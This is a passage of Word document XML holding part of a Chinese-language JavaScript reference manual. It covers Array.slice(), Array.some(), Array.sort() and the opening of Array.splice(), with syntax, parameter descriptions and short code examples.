        <w:t>没有修改数组。如果想要移除数组的一部分，请使用</w:t>
      </w:r>
      <w:r>
        <w:t>Array.splice()</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a=[1,2,3,4,5];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.slice(0,3);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>[1,2,</w:t>
      </w:r>
      <w:r>
        <w:t>3]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.slice(3);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>[4,5]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.slice(1,-1);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>[2,3,4]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.slice(-3,-2);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>[3];</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>IE4</w:t>
      </w:r>
      <w:r>
        <w:t>下有误：返回</w:t>
      </w:r>
      <w:r>
        <w:t>[1,2,3]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>bug</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>IE4</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>参数不能为负数。在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>的后续版本中已经修复该</w:t>
      </w:r>
      <w:r>
        <w:t>bug</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Array.splice()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="594" w:name="Array_some__"/>
      <w:r>
        <w:t>Array.some()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="594"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>测试是否有元素满足断言函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>array.some(predicate)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>array.some(predicate,o)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>predicate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用来测试数组元素的断言函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>predicate</w:t>
      </w:r>
      <w:r>
        <w:t>时的可选</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>返回值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>中有至少一个元素调用</w:t>
      </w:r>
      <w:r>
        <w:t>predicate</w:t>
      </w:r>
      <w:r>
        <w:t>时返回真值，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。如果所有元素调用</w:t>
      </w:r>
      <w:r>
        <w:t>predicate</w:t>
      </w:r>
      <w:r>
        <w:t>时都返回假值，则返回</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some()</w:t>
      </w:r>
      <w:r>
        <w:t>方法用来测试数组中是否有元素满足某些条件。它会按照从小到大的顺序遍历</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>的元素，并依次对每个元素调用指定的</w:t>
      </w:r>
      <w:r>
        <w:t>predicate</w:t>
      </w:r>
      <w:r>
        <w:t>函数。如果</w:t>
      </w:r>
      <w:r>
        <w:t>predicate</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>（或任何可以转化为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>的值），则</w:t>
      </w:r>
      <w:r>
        <w:t>some()</w:t>
      </w:r>
      <w:r>
        <w:t>会停止遍历，并立刻返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。如果</w:t>
      </w:r>
      <w:r>
        <w:t>pre</w:t>
      </w:r>
      <w:r>
        <w:t>dicate</w:t>
      </w:r>
      <w:r>
        <w:t>的每一次调用都返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>（或任何可以转化为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>的值），则</w:t>
      </w:r>
      <w:r>
        <w:t>some()</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。当遍历的数组为空时，</w:t>
      </w:r>
      <w:r>
        <w:t>some()</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该方法很类似</w:t>
      </w:r>
      <w:r>
        <w:t>every()</w:t>
      </w:r>
      <w:r>
        <w:t>。更多细节请参考</w:t>
      </w:r>
      <w:r>
        <w:t>Array.every()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Array.forEach()</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[1,2,3].some(function(x){return x</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>5;});//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false:</w:t>
      </w:r>
      <w:r>
        <w:t>没有元素＞</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>[1,2,3].some(function(x){return x</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>2;});//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:</w:t>
      </w:r>
      <w:r>
        <w:t>有些元素＞</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>[].some(function(x){return false;});//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false:[]</w:t>
      </w:r>
      <w:r>
        <w:t>总是返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</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Array.every()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Array.filter()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Array.forEach()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="595" w:name="Array_sort__"/>
      <w:r>
        <w:t>Array.sort()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="595"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对数组元素进行排序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>array.sort()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>array.sort(orderfunc)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>orderfunc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用来指定如何排序的可选函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该数组的引用。注意是在原数组中进行排序，没有新建数组。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>sort()</w:t>
      </w:r>
      <w:r>
        <w:t>方法在原数组中对数组元素进行排序，</w:t>
      </w:r>
      <w:r>
        <w:t>没有创建新数组。如果在调用</w:t>
      </w:r>
      <w:r>
        <w:t>sort()</w:t>
      </w:r>
      <w:r>
        <w:t>时不带参数，将按字母顺序（更精确地说，是字</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>符编码顺序）对数组中的元素进行排序。要实现这一点，首先要把元素转化为字符串（如果有必要的话），以便进行比较。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果想按照其他顺序来进行排序，就必须提供比较函数，该函数要比较两个值，然后返回一个数字来表明这两个值的相对顺序。比较函数需要接受两个参数</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>，并返回如下值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>一个小于</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>的值。在这种情况下，表示根据排序标准，</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>小于</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>，在排序后的数组中，</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>应该排列在</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>的前面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·0</w:t>
      </w:r>
      <w:r>
        <w:t>。在这种排序下，</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>是相等的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>一个大于</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>的值。在这</w:t>
      </w:r>
      <w:r>
        <w:t>种情况下，</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>大于</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意：数组中的</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>元素会始终排列在数组末尾。即便提供了自定义的比较函数，也是如此，因为</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>值不会传递给提供的</w:t>
      </w:r>
      <w:r>
        <w:t>orderfunc</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>示例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面的代码展示了如何书写一个比较函数，来使得对一个数值数组按数值排序，而不是按字母排序：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>用于数值排序的排序函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function numberorder(a,b){return a-b;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>a=new Array(33,4,1111,222);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.sort();//</w:t>
      </w:r>
      <w:r>
        <w:t>字母排序：</w:t>
      </w:r>
      <w:r>
        <w:t>1111,222,33,4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.sort(numberorder);//</w:t>
      </w:r>
      <w:r>
        <w:t>数值排序：</w:t>
      </w:r>
      <w:r>
        <w:t>4,33,222,1111</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="596" w:name="Array_splice__"/>
      <w:r>
        <w:t>Array.splice()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="596"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>插入、删除或替换数组元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>array.splice(start,deleteCount,value,...)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>开始插入和（或）删除处的数组元素的序号。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>deleteCount</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要删除的元素个数，从</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>开始，并包含</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>处的元素。如果指定为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，表示插入元素，而不用删除任何元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>value,...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要插入数组中的零个或多个值，从</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>序号处开始插入。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如果从</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>中删除了元素，则返回一个新数组，包含这些删除的元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>splice()</w:t>
      </w:r>
      <w:r>
        <w:t>将删除从</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>开始（包括</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>处）的零个或多个元素，并且用参数列表中指定的零个或多个值来替换掉那些删除的元素。位于插入或删除的元素之后的数组元素，在有必要时都会移动，以保持与数组中剩余元素的连续性。注意，虽然</w:t>
      </w:r>
      <w:r>
        <w:t>splice()</w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>slice()</w:t>
      </w:r>
      <w:r>
        <w:t>的方法名类似，但作用不是类似的，</w:t>
      </w:r>
      <w:r>
        <w:t>splice()</w:t>
      </w:r>
      <w:r>
        <w:t>会直接修改数组。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>示例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通过例子就很容易理解</w:t>
      </w:r>
      <w:r>
        <w:t>splice()</w:t>
      </w:r>
      <w:r>
        <w:t>的操作：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=[1,2,3,4,5,6,7,8];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>.splice(1,2);//</w:t>
      </w:r>
      <w:r>
